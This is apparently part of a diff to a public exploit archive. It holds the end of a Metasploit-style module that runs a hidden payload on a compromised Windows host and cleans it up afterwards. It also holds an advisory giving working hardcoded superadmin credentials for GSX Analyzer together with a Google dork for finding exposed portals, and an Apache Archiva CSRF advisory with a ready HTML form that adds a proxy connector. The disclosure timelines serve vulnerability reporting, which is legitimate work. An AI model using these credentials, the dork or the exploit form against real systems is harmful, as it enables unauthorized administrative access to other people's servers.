args = nil
begin
process = session.sys.process.execute(cmd, args, {
'Hidden' => true,
'Channelized' => false
})
rescue
print_error("An error occurred executing the script.")
end
end
def cleanup
sleep_t = datastore['TIMEOUT']
vprint_warning("Sleeping #{sleep_t} seconds before deleting #{@upfile}...")
sleep sleep_t
begin
rm_f(@upfile)
print_good("Cleaned up #{@upfile}")
rescue
print_error("There was an issue with cleanup of the powershell payload script.")
end
end
end

31
platforms/windows/webapps/40106.txt Executable file
View file

@ -0,0 +1,31 @@
# Exploit Title: GSX Analyzer hardcoded superadmin credentials in Main.swf
# Google Dork: inurl:"/Main.swf?cachebuster=" (need to manually look for stringtitle "Loading GSX Analyzer ... 0%")
# Date: 12-07-16
# Exploit Author: ndevnull
# Vendor Homepage: http://www.gsx.com/products/gsx-analyzer
# Software Link: http://www.gsx.com/download-the-trial-ma
# Version: 10.12, but also found in version 11
# Tested on: Windows Server 2008
# CERT : VR-241
# CVE :
1. Description
After decompiling the SWF file "Main.swf", a hardcoded credential in one of the products of GSX, namely GSX Analyzer, has been found. Credential is a superadmin account, which is not listed as a user in the userlist, but can be used to login GSX Analyzer portals. Seemingly a backdoor or a "solution" to provide "support" from the vendor.
The found credentials are:
Username: gsxlogin
Password: gsxpassword
2. Proof of Concept
A few sites externally on the internet are affected by this incident. Presumably all of the externally disclosed GSX analyzer portals have this vulnerability.
Code snippet:
-----------------
if ((((event.getLogin().toLowerCase() == "gsxlogin")) && ((event.getPwd() == "gsxpassword")))){
-----------------
3. Solution:
Vendor has been informed on 12-06-16, also CERT has been notified with ID VR-241

138
platforms/xml/webapps/40109.txt Executable file
View file

@ -0,0 +1,138 @@
RCE Security Advisory
https://www.rcesecurity.com
1. ADVISORY INFORMATION
=======================
Product: Apache Archiva
Vendor URL: https://archiva.apache.org
Type: Cross-Site Request Forgery [CWE-253]
Date found: 2016-05-31
Date published: 2016-07-11
CVSSv3 Score: 5.4 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N)
CVE: CVE-2016-4469
2. CREDITS
==========
This vulnerability was discovered and researched by Julien Ahrens from
RCE Security.
3. VERSIONS AFFECTED
====================
Apache Archiva v1.3.9
older versions may be affected too.
4. INTRODUCTION
===============
Apache Archiva™ is an extensible repository management software that helps
taking care of your own personal or enterprise-wide build artifact
repository. It is the perfect companion for build tools such as Maven,
Continuum, and ANT.
(from the vendor's homepage)
5. VULNERABILITY DETAILS
========================
The application basically offers a Cross-Site Request Forgery protection
using the a Struts-based token called "token". While many administrative
functionalities like adding new users are protected on this way, the
following HTTP POST-based functions are missing this token and are
therefore vulnerable to CSRF:
Adding new repository proxy connectors:
/archiva/admin/addProxyConnector_commit.action
Adding new repositories:
/archiva/admin/addRepository_commit.action
Editing existing repositories:
/archiva/admin/editRepository_commit.action
Adding legacy artifact paths:
/archiva/admin/addLegacyArtifactPath_commit.action
Changing the organizational appearance:
/archiva/admin/saveAppearance.action
Uploading new artifacts:
/archiva/upload_submit.action
The following Proof-of-Concept triggers this vulnerability and adds a new
proxy connector called "CSRF":
<html>
<body>
<form
action="http://localhost:8080/archiva/admin/addProxyConnector_commit.action"
method="POST">
<input type="hidden" name="pattern" value="" />
<input type="hidden" name="connector&#46;order" value="0" />
<input type="hidden" name="connector&#46;proxyId"
value="&#40;direct&#32;connection&#41;" />
<input type="hidden" name="connector&#46;sourceRepoId" value="CSRF" />
<input type="hidden" name="connector&#46;targetRepoId"
value="maven2&#45;repository&#46;dev&#46;java&#46;net" />
<input type="hidden"
name="connector&#46;policies&#91;&apos;propagate&#45;errors&#45;on&#45;update&apos;&#93;"
value="always" />
<input type="hidden"
name="connector&#46;policies&#91;&apos;cache&#45;failures&apos;&#93;"
value="no" />
<input type="hidden"
name="connector&#46;policies&#91;&apos;releases&apos;&#93;"
value="always" />
<input type="hidden"
name="connector&#46;policies&#91;&apos;propagate&#45;errors&apos;&#93;"
value="stop" />
<input type="hidden"
name="connector&#46;policies&#91;&apos;checksum&apos;&#93;" value="fail" />
<input type="hidden"
name="connector&#46;policies&#91;&apos;snapshots&apos;&#93;"
value="always" />
<input type="hidden" name="propertyKey" value="" />
<input type="hidden" name="propertyValue" value="" />
<input type="hidden" name="blackListPattern" value="" />
<input type="hidden" name="whiteListPattern" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
6. RISK
=======
To successfully exploit this vulnerability a user with administrative rights
must be tricked into visiting an arbitrary website while having an
authenticated session in the application.
The vulnerability allows remote attackers to perform sensitive
administrative actions like adding new repository proxy connectors, adding
new repositories, editing existing repositories, adding legacy artifact
paths, changing the organizational appearance or uploading new artifacts in
the authentication context of the targeted user.
7. SOLUTION
===========
Upgrade/Migrate to Apache Archiva 2.2.1
8. REPORT TIMELINE
==================
2016-05-31: Discovery of the vulnerability
2016-05-31: Notified vendor via public security mail address
2016-06-06: No response, sent out another notification
2016-06-10: Vendor states that this version is out of support
2016-06-21: Vendor assigns CVE-2016-4469
2016-07-11: Advisory released
9. REFERENCES
=============
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4469